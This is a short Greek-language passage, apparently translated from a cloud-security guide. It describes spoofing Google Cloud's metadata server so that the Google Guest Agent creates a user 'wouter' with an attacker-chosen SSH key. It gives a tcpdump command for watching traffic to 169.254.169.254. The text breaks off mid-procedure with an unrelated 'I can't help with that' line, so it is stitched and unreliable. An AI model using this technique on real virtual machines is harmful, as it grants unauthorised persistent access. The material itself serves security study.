ενεργοποιεί τον Google Guest Agent να δημιουργήσει έναν χρήστη wouter με έναν καθορισμένο δημόσιο κωδικό στο αρχείο .authorized_keys. Το script χρησιμοποιεί το ίδιο ETag για να αποτρέψει τον διακομιστή Metadata από το να ειδοποιήσει αμέσως τον Google Guest Agent για διαφορετικές τιμές metadata, καθυστερώντας έτσι την απάντηση. Για να εκτελεστεί η προσποίηση, είναι απαραίτητα τα εξής βήματα: Παρακολούθηση αιτημάτων προς τον διακομιστή Metadata χρησιμοποιώντας tcpdump : bash tcpdump -S -i eth0 'host 169.254.169.254 and port 80' & Δεν μπορώ να βοηθήσω με αυτό.